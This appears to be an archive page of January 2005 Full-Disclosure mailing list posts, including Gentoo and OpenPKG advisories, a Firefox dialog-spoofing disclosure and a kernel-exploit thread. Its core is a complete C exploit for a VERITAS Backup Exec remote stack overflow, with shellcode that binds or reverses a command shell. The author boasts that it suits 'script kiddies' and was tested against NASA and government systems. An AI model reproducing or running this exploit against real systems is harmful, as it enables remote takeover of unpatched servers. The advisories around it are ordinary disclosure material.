        http://koffice.kde.org/security/2004_xpdf_integer_overflow_2.php

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-17.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBB49IYzKC5hMHO6rkRAnViAJ9rKHtfU7GZImebhFban1s5UhOWUwCfQbk7
XJ17GeQmVkA1EJQN3D3Gin4=
=YK28
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [gentoo-announce] [ GLSA 200501-17 ] KPdf, KOffice: More vulnerabilities in included Xpdf

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Tue Jan 11 2005 - 07:18:11 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  Severity: Normal
     Title: KPdf, KOffice: More vulnerabilities in included Xpdf
      Date: January 11, 2005
      Bugs: #75203, #75204
        ID: 200501-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

KPdf and KOffice both include vulnerable Xpdf code to handle PDF files,
making them vulnerable to the execution of arbitrary code if a user is
enticed to view a malicious PDF file.

Background
==========

KPdf is a KDE-based PDF viewer included in the kdegraphics package.
KOffice is an integrated office suite for KDE.

Affected packages
=================

Description
===========

KPdf and KOffice both include Xpdf code to handle PDF files. Xpdf is
vulnerable to multiple new integer overflows, as described in GLSA
200412-24.

Impact
======

An attacker could entice a user to open a specially-crafted PDF file,
potentially resulting in the execution of arbitrary code with the
rights of the user running the affected utility.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All KPdf users should upgrade to the latest version of kdegraphics:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdegraphics

Note: There is currently no fixed stable 3.3.x version for sparc.

All KOffice users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose app-office/koffice

References
==========

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-17.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBB49IYzKC5hMHO6rkRAnViAJ9rKHtfU7GZImebhFban1s5UhOWUwCfQbk7
XJ17GeQmVkA1EJQN3D3Gin4=
=YK28
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] VERITAS Backup Exec 8.x/9.x Remote UniversalExploit

From: class 101 (class101hat-squad.com)
Date: Tue Jan 11 2005 - 07:56:07 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

you can get my clean code there dfind.kd-team.com
Bye and good urgent patching ;)
-------------------------------------------------------------
class101
Hat-Squad.com
-------------------------------------------------------------
  ----- Original Message -----
  From: class 101
  To: full-disclosurelists.netsys.com ; bugtraqsecurityfocus.com
  Sent: Tuesday, January 11, 2005 12:39 PM
  Subject: [Full-Disclosure] VERITAS Backup Exec 8.x/9.x Remote UniversalExploit

Because k-otik are poor looser not respecting the publication of metasploit 2.3 , im forced to post my code.

  /*
  VERITAS Backup Exec v9.1.4691.SP1
                      v9.1.4691.SP0
       v8.5.3572
  Agent Browser Service, Remote Stack Overflow

Highly Critical

All credits to:

  -iDEFENSE(discovery-www.iDEFENSE.com),
  -Thor Doomen(iat-syscall[at]inbox.lv),
  -H.D. Moore(scode-www.metasploit.com),
  -Matt Miller(scode-www.hick.org)

ExtraNotes:

  All my tests/debugs where a bit long (some days) firstly due to the big size
  of Backup Exec and the unstability accross differents windows versions
  to make working that IAT method with 100% success and the difficulty to debug it.
  (As a recall, due to the 60 bytes only free, a tiny shellcode is send in first to scan
  the recv function of benetns.exe and jump to the data submitted during the second send,
  thanx syscall. Let's think large now. Imagine that you exploits the hole and you submit
  the shellcode 5 minutes later, the service will hang on to death of course until a kill,
  now imagine that you exploits the hole and you submit the shellcode too faslty for the,
  computer processing, the shellcode can be missed, wont be executed again, sometimes yes/no, but really unstable.
  Hopefully (or unfortunely for you admin :>) I'm here to optimize it and make it 100% working, universal,
  stable whatever you want for the good fortune of script kiddies and to show what mean working to my good
  friends ka-odick :>
                                                   Tries
     Machine Bind / Rverse / Success

   (2x) Win2k SP4 Server English 10 10 20
   (1x) Win2k SP4 Pro English 5 5 10
   (1x) WinXP SP1 Pro English 5 5 10
   (1x) WinXP SP1a Pro English 5 5 10
   (3x) Win2003 SP0 Server English 5 5 10
   (1x) Win2003 SP0 Server Ita. 5 5 10
   (1x) NT4 Server English. 5 5 10

= Universal

  v0.1:
  C code based on Thor Doomen's code posted at the metasploit mailing list,
  excellent in the method, but super unstable to not say not working when used,
  made some changes.

  v0.2:
  fix of the first big problem , the missed shellcode accross differents windows,
  fixed by flooding benetns with more sends, timer really small, this is important.
  padding 1 nop to the reverse shellcode as needed, else crash on reverse.

v0.3:
universal esi call across v9.1 SP0 and SP1, for the good fortune of script kiddies.

  v0.4:
  As a warning, this poc v0.4 as been tested working by an anonymous tester (never mentionned there)
  on some organisations such nasa, states/edus, it's urgent to update 1 month after the advisory, sleepers.

  Tips: -make sure that your ip is safe of null bytes in reverse mode.
        -make sure that you targets the good version of Backup Exec,
        else you crash it.
     -Backup Exec v10.0 is now available, get it at www.veritas.com.
     -Visit dfind.kd-team.com for a patched benetns.exe, quick solution
     for an urgent update. (extracted from the hotfix at www.veritas.com)
        Backup Exec 9.x is tested safe after replacing the .exe

  Greetings:
     Nima Majidi
     Behrang Fouladi
     Pejman
     keystr0ke
     JGS
     DiabloHorn
     kimatrix
     NaV
     New Metasploit v2.3 (http://www.metasploit.com/)
     and all idlers of #n3ws on Eris Free Network.

by class101 [at] hat-squad.com
answering to all stupid questions that I got & will have, no I'm not persian and you don't care where I come from.

  04 January 2005
  */
  #include <stdio.h>
  #include <string.h>
  #include <time.h>
  #ifdef WIN32
  #include "winsock2.h"
  #pragma comment(lib, "ws2_32")
  #else
  #include <sys/socket.h>
  #include <sys/types.h>
  #include <netinet/in.h>
  #include <netinet/in_systm.h>
  #include <netinet/ip.h>
  #include <netdb.h>
  #include <arpa/inet.h>
  #include <unistd.h>
  #include <stdlib.h>
  #include <fcntl.h>
  #endif

  char scode1[]=
  file://Matt Millers 'skape' shellcode.
  "\x90" // pad needed their for me, if you get scode detection problems on slow connections,
  file://try to add more NOP and make sure to update the memcpys later in the code.
  "\xeb\x6e\x33\xc0\x64\x8b\x40\x30\x85\xc0\x78\x0d\x56\x8b\x40\x0c\x8b\x70\x1c\xad"
  "\x8b\x40\x08\x5e\xc3\x8b\x40\x34\x83\xc0\x7c\x8b\x40\x3c\xc3\x60\x8b\x6c\x24\x24"
  "\x8b\x45\x3c\x8b\x7c\x05\x78\x03\xfd\x8b\x4f\x18\x8b\x5f\x20\x03\xdd\xe3\x33\x49"
  "\x8b\x34\x8b\x03\xf5\x33\xc0\x99\xfc\xac\x84\xc0\x74\x07\xc1\xca\x0d\x03\xd0\xeb"
  "\xf4\x3b\x54\x24\x28\x75\xe2\x8b\x5f\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5f\x1c\x03"
  "\xdd\x8b\x04\x8b\x03\xc5\x89\x44\x24\x1c\x61\xc3\xeb\x35\xad\x50\x52\xe8\xa9\xff"
  "\xff\xff\x89\x07\x83\xc4\x08\x83\xc7\x04\x3b\xf1\x75\xec\xc3\x8e\x4e\x0e\xec\x72"
  "\xfe\xb3\x16\x7e\xd8\xe2\x73\xad\xd9\x05\xce\xd9\x09\xf5\xad\xec\xf9\xaa\x60\xcb"
  "\xed\xfc\x3b\xe7\x79\xc6\x79\x83\xec\x60\x8b\xec\xeb\x02\xeb\x05\xe8\xf9\xff\xff"
  "\xff\x5e\xe8\x47\xff\xff\xff\x8b\xd0\x83\xee\x2e\x8d\x7d\x04\x8b\xce\x83\xc1\x10"
  "\xe8\xa5\xff\xff\xff\x83\xc1\x10\x33\xc0\x66\xb8\x33\x32\x50\x68\x77\x73\x32\x5f"
  "\x8b\xdc\x51\x52\x53\xff\x55\x04\x5a\x59\x8b\xd0\xe8\x85\xff\xff\xff\xb8\x01\x63"
  "\x6d\x64\xc1\xf8\x08\x50\x89\x65\x30\x33\xc0\x66\xb8\x90\x01\x2b\xe0\x54\x83\xc0"
  "\x72\x50\xff\x55\x1c\x33\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x14\x8b\xf0"
  "\x68\x7f\x01\x01\x01\xb8\x02\x01\x11\x5c\xfe\xcc\x50\x8b\xdc\x33\xc0\xb0\x10\x50"
  "\x53\x56\xff\x55\x18\x33\xc9\xb1\x54\x2b\xe1\x8b\xfc\x57\x33\xc0\xf3\xaa\x5f\xc6"
  "\x07\x44\xfe\x47\x2d\x57\x8b\xc6\x8d\x7f\x38\xab\xab\xab\x5f\x33\xc0\x8d\x77\x44"
  "\x56\x57\x50\x50\x50\x40\x50\x48\x50\x50\xff\x75\x30\x50\xff\x55\x08\xf7\xd0\x50"
  "\xff\x36\xff\x55\x10\xff\x77\x38\xff\x55\x20\xff\x55\x0c\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

  char scode2[]=
  file://HD.Moore Shellcode
  file://"\x90" uncomment this if you have scode detection problem on slows connections or try more NOP,
  file://but for me and some other guys its already fine like this.
  "\xEB"
  "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
  "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
  "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
  "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
  "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
  "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
  "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
  "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
  "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
  "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
  "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
  "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
  "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
  "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
  "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
  "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
  "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
  "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
  "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
  "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
  "\x58\x68\x61\x63\x6B\x90";

  static char payload[800];
  char v91sp0sp1[]="\xFF\x50\x11\x40";
  char esisp0sp1[]="\xA1\xFF\x42\x01";
  char v85[]="\xFF\x38\x11\x40";
  char esiold[]="\xB9\x08\x43\x01";

  char talk[] =
  "\x02\x00\x32\x00"
  "\x90\x90\x90\x90"
  "\x31\xF6\xC1\xEC\x0C\xC1\xE4\x0C\x89\xE7\x89\xFB\x6A\x01\x8B\x74"
  "\x24\xFE\x31\xD2\x52\x42\xC1\xE2\x10\x52\x57\x56\xB8\x00\x00\x00"
  "\x00\xC1\xE8\x08\xFF\x10\x85\xC0\x79\x07\x89\xDC\x4E\x85\xF6\x75"
  "\xE1\xFF\xE7\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\x00"
  "1.1.1.1.1.1"
  "\x00"
  "\xEB\x80";

  #ifdef WIN32
   WSADATA wsadata;
  #endif

void ver();
void usage(char* us);

  int main(int argc,char *argv[])
  {
   ver();
   unsigned long gip;
   unsigned short gport;
   char *os;
   if (argc>6||argc<3||atoi(argv[1])>2||atoi(argv[1])<1){usage(argv[0]);return -1;}
   if (argc==5){usage(argv[0]);return -1;}
      if (strlen(argv[2])<7){usage(argv[0]);return -1;}
      if (argc==6)
   {
          if (strlen(argv[4])<7){usage(argv[0]);return -1;}
   }
  #ifndef WIN32
   if (argc==6)
   {
     gip=inet_addr(argv[4])^(long)0x00000000;
    gport=htons(atoi(argv[5]))^(short)0x0000;
   }
  #define Sleep sleep
  #define SOCKET int
  #define closesocket(s) close(s)
  #else
   if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup error\n");return -1;}
   if (argc==6)
   {
    gip=inet_addr(argv[4])^(ULONG)0x00000000;
    gport=htons(atoi(argv[5]))^(USHORT)0x0000;
   }
  #endif
   int ip=htonl(inet_addr(argv[2])), port;
   if (argc==4||argc==6){port=atoi(argv[3]);} else port=6101;
   SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
   s=socket(AF_INET,SOCK_STREAM,0);
   if (s==-1){printf("[+] socket() error\n");return -1;}
   if (atoi(argv[1])==1) {memcpy(&talk[37], &v91sp0sp1, 4);memcpy(&talk[72], &esisp0sp1, 4);os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";}
   else {memcpy(&talk[37], &v85, 4);memcpy(&talk[72], &esiold, 4);os="Backup Exec v8.5.3572";}
   if (argc==6)
   {
    memcpy(&scode1[282], &gip, 4);
    memcpy(&scode1[289], &gport, 2);
    strcat(payload,scode1);
   }
   else strcat(payload,scode2);
   printf("[+] target(s): %s\n",os);
   server.sin_family=AF_INET;
   server.sin_addr.s_addr=htonl(ip);
   server.sin_port=htons(port);
   connect(s,( struct sockaddr *)&server,sizeof(server));
   timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
   switch(select(s+1,NULL,&mask,NULL,&timeout))
   {
    case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
    case 0: {printf("[+] connect() error\n");closesocket(s);return -1;}
    default:
    if(FD_ISSET(s,&mask))
    {
     printf("[+] connected, constructing the payload...\n");
     if (send(s,talk,sizeof(talk)-1,0)==-1) { printf("[+] sending error 1, the server prolly rebooted.\n");return -1;}

  #ifdef WIN32
     Sleep(10);
  #else
     Sleep(1/100);
  #endif
     if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 2, the server is patched.\n");return -1;}

  #ifdef WIN32
     Sleep(10);
  #else
     Sleep(1/100);
  #endif

if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 3, the server is patched.\n");return -1;}

  #ifdef WIN32
     Sleep(10);
  #else
     Sleep(1/100);
  #endif

if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 4, the server is patched.\n");return -1;}

  #ifdef WIN32
     Sleep(10);
  #else
     Sleep(1/100);
  #endif

if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 5, the server is patched.\n");return -1;}

  #ifdef WIN32
     Sleep(10);
  #else
     Sleep(1/100);
  #endif
     if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 6, the server is patched.\n");return -1;}

  #ifdef WIN32
     Sleep(10);
  #else
     Sleep(1/100);
  #endif
     if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 7, the server is patched.\n");return -1;}

  #ifdef WIN32
     Sleep(10);
  #else
     Sleep(1/100);
  #endif
     if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error 8, the server is patched.\n");return -1;}
  #ifdef WIN32
     Sleep(1000);
  #else
     Sleep(1);
  #endif
     printf("[+] size of payload: %d\n",(sizeof(talk)-1)+strlen(payload)*7);
     printf("[+] payload sent.\n");
     return 0;
    }
   }
   closesocket(s);
  #ifdef WIN32
   WSACleanup();
  #endif
   return 0;
  }

  void usage(char* us)
  {
   printf("USAGE:\n");
   printf(" [+] . 101_BXEC.exe Version VulnIP\n");
   printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT\n");
   printf(" [+] . 101_BXEC.exe Version VulnIP VulnPORT GayIP GayPORT\n");
   printf("VERSION: \n");
   printf(" [+] 1. Backup Exec v9.1.4691.SP1\n");
   printf(" [+] 1. Backup Exec v9.1.4691.SP0\n");
   printf(" [+] 2. Backup Exec v8.5.3572\n");
   printf("TARGET: \n");
   printf(" [+] . 2k3/2k/XP/NT4 universal (*)\n");
   printf("NOTE: \n");
   printf(" The exploit bind a cmdshell port 101 or\n");
   printf(" reverse a cmdshell on your listener.\n");
   printf(" A wildcard (*) mean tested working.\n");
   printf(" Compilation msvc6, cygwin, Linux.\n");
   return;
  }
  void ver()
  {
   printf(" \n");
   printf(" ================================================[0.4]========\n");
   printf(" =================VERITAS Backup Exec 8.x/9.x=================\n");
   printf(" =========Agent Browser Service, Remote Stack Overflow========\n");
   printf(" ======coded by class101=============[Hat-Squad.com 2005]=====\n");
   printf(" =============================================================\n");
   printf(" \n");
  }

  -------------------------------------------------------------
  class101
  Hat-Squad.com
  -------------------------------------------------------------

------------------------------------------------------------------------------

  _______________________________________________
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200501-18 ] KDE FTP KIOslave: Command injection

From: Sune Kloppenborg Jeppesen (jaervoszgentoo.org)
Date: Tue Jan 11 2005 - 07:33:11 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

  Severity: Normal
     Title: KDE FTP KIOslave: Command injection
      Date: January 11, 2005
      Bugs: #73759
        ID: 200501-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The FTP KIOslave contains a bug allowing users to execute arbitrary FTP
commands.

Background
==========

Affected packages
=================

Description
===========

The FTP KIOslave fails to properly parse URL-encoded newline
characters.

Impact
======

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All kdelibs users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose kde-base/kdelibs

Note: There is currently no fixed stable 3.3.x version for sparc.

References
==========

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-18.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBB49WbzKC5hMHO6rkRAlyhAJ9UAm9Z7haLxgOGHuR/2g0XyGV0dgCfbqn7
qnWuWPoBcG7Un+yg5GHdmA0=
=R8xh
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] Firespoofing [Firefox 1.0]

From: Soderland, Craig (craig.soderlandsap.com)
Date: Tue Jan 11 2005 - 08:37:20 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This does not work if you are using the FireFox 1.0 tabbed browsing
feature, as your pop up window simply opens a new tab, and it then
becomes immediately obvious what you are trying to pull off here.

> -----Original Message-----
> From: full-disclosure-bounceslists.netsys.com
[mailto:full-disclosure-
> bounceslists.netsys.com]
> Sent: Monday, January 10, 2005 6:22 PM
> To: full-disclosurelists.netsys.com; bugtraqsecurityfocus.com;
> NTBUGTRAQlistserv.ntbugtraq.com
> Subject: [Full-Disclosure] Firespoofing [Firefox 1.0]
>
> __Summary
>
> Using javascript it is possible to spoof the content of security and
> download dialogs by partly covering them with a popup window. This can
> fool
> a user to download and automaticly execute a file (if a file extension
> association exists) or to grant a script local data access (if
codebase
> principals are enabled).
>
> __Expected Behavior
>
> Modal dialogs should always be on top and it should not be possible to
> obfuscate their appearance.
>
> __Proof-of-Concept
>
> http://www.mikx.de/firespoofing/
>
> The PoC is designed for Firefox 1.0 running in a maximized window.
>
> Part 1 - download dialog spoofing
> Shows how to cover a download dialog and fool the user to execute a
file
> with a standard windows file association (in this case a .ht file).
BTW,
> remember the latest .ht buffer overflow...
>
> Part 2 - security dialog spoofing
> Shows how to cover a security dialog. Make sure codebase principals
are
> enabled (not default but encouraged by many XUL sites). Creates the
file
> c:\booom.txt to proof local system access.
>
> __Status
>
> The bug is confirmed but currently unfixed (open for more than 3
months).
> As
> a partial workaround set dom.disable_window_flip to true in
about:config.
> The vendor failed to respond to multiple status requests which led to
this
> public disclosure.
>
> 2004-09-20 Vendor informed (bugzilla.mozilla.org #260560)
> 2004-09-20 Vendor confirmed bug
> 2004-10-20 Status request (open for 1 month - no reply)
> 2005-01-03 Status request (open for 3 months - no reply)
> 2005-01-07 Status request (disclosure warning - no reply)
> 2005-01-11 Public disclosure
>
> __Affected Software
>
> Tested with Firefox 1.0, Mozilla 1.7.5 and Netscape 7.1 on Windows XP
SP2.
>
> __Contact Informations
>
> Michael Krax <mikxmikx.de>
> http://www.mikx.de/?p=7
>
> mikx
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

From: Athanasius (Athanasiusmiggy.org)
Date: Tue Jan 11 2005 - 08:20:52 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, Jan 11, 2005 at 07:56:32AM +0000, Marcy Darcy wrote:
> I'm running a small server with the 2.6.10 kernel.
>
> The exploit doesen't seem to be working on this kernel. Is there a way
> to make sure the sistem is vulnerable or not?

  I couldn't get the exploit to work for 2.6.10 either. First there's
changing a struct in it to user_desc to make it compile, then it just
SEGVs all the time here.
  This is quite apart from the fact it's trying to exploit a race
condition and as such can take a lot of attempts in a loop to actually
work anyway (must have hit it on the 50th or more iteration on my 2.4.28
machine).
  Anyone got working exploit code for 2.6.10 ?

-Ath
--
- Athanasius = Athanasius(at)miggy.org / http://www.miggy.org/
Finger athan(at)fysh.org for PGP key
"And it's me who is my enemy. Me who beats me up.
Me who makes the monsters. Me who strips my confidence." Paula Cole - ME

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iEYEARECAAYFAkHj4MMACgkQIr2uvLNOS8MuWACfSintsVsqa2/DskXiSa3hPRs+
6IgAn0x0uLrtORVFy/U46DYM/SuWdWwY
=WxVs
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Shoe 1.0 - Remote Lace Overflow

From: stonersavant (dank.krewgmail.com)
Date: Tue Jan 11 2005 - 09:05:12 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I tested this in my lab. I'm happy to report that s10.5 Ninja Tabi
boots appear to be unaffected by the vulnerability.

savant
http://johnny.ihackstuff.com

On Sun, 26 Dec 2004 19:45:54 -0500, Nancy Kramer
<nekramermindtheater.net> wrote:
> The points on cowboy boots are also great for stepping on cockroaches in
> corners thereby helping one maintain a bug free environment.
>
> Regards,
>
> Nancy Kramer
> Webmaster http://www.americandreamcars.com
> Free Color Picture Ads for Collector Cars
> One of the Ten Best Places To Buy or Sell a Collector Car on the Web
>
>
> At 06:49 PM 12/25/2004, Thomas Sutpen wrote:
>
> >On Wed, 22 Dec 2004 11:20:45 -0500, announce0x90.org <announce0x90.org>
> >wrote:
> >[...]
> > > Vulnerable Sizes:
> > > -----------------
> > > 6 through 13. Other sizes may be vulnerable, but were unavailable for
> > testing.
> >
> >Cursory note: The guy with the size 13s must get all the chicks. You
> >know what they say ....
> >
> >[...]
> >
> > > Fix:
> > > ----
> > > Do not wear untrusted shoes sent to you. Other possible workarounds
> > include
> > > sandals (aka. flip-flops). These are a good work-around and are widely
> > > available for those concerned about their security.
> >
> >Merrell also makes a "Jungle Moc" that is a mitigating factor to this
> >vulnerability. All shoes of similar "Moccasin" styles, as well as
> >Cowboy Boots, also seem to be unaffected. Cowboy Boots with spurs
> >seem to add an additional layer of security, as well as cool points.
> >
> >Review of their website seems to indicate that they're going to be
> >discontinuing the line, though. So, with Boxing Day tommorrow, I'd
> >recommend snapping up a few pairs as a cautionary posture against the
> >possibility of future attacks.
> >
> >[...]
> >
> >TS
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> >
> >
> >---
> >Incoming mail is certified Virus Free.
> >Checked by AVG anti-virus system (http://www.grisoft.com).
> >Version: 6.0.822 / Virus Database: 560 - Release Date: 12/22/2004
>
>
>
> ---
> Outgoing mail is certified Virus Free.
> Checked by AVG anti-virus system (http://www.grisoft.com).
> Version: 6.0.822 / Virus Database: 560 - Release Date: 12/22/2004
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>

--
someone is watching you.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [OpenPKG-SA-2005.001] OpenPKG Security Advisory (perl)

From: OpenPKG (openpkgopenpkg.org)
Date: Tue Jan 11 2005 - 09:09:17 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

________________________________________________________________________

OpenPKG Security Advisory The OpenPKG Project
http://www.openpkg.org/security.html http://www.openpkg.org
openpkg-securityopenpkg.org openpkgopenpkg.org
OpenPKG-SA-2005.001 11-Jan-2005
________________________________________________________________________

Package: perl
Vulnerability: information disclosure, insecure permissions
OpenPKG Specific: no

Affected Releases: Affected Packages: Corrected Packages:
OpenPKG CURRENT <= perl-5.8.6-20041129 >= perl-5.8.6-20050111
OpenPKG 2.2 <= perl-5.8.5-2.2.0 >= perl-5.8.5-2.2.1
OpenPKG 2.1 <= perl-5.8.4-2.1.0 >= perl-5.8.4-2.1.1

Dependent Packages: none

Description:
  Jeroen van Wolffelaar discovered that the rmtree() function in the
  Perl [0] File::Path module removes directory trees in an insecure
  manner which could lead to the removal of arbitrary files and
  directories through a symlink attack. The Common Vulnerabilities and
  Exposures (CVE) project assigned the id CAN-2004-0452 [1] to the
  problem.

  Trustix developers discovered several insecure uses of temporary files
  in many modules which allow a local attacker to overwrite files via a
  symlink attack. The Common Vulnerabilities and Exposures (CVE) project
  assigned the id CAN-2004-0976 [2] to the problem.

  Please check whether you are affected by running "<prefix>/bin/openpkg
  rpm -q perl". If you have the "perl" package installed and its version
  is affected (see above), we recommend that you immediately upgrade it
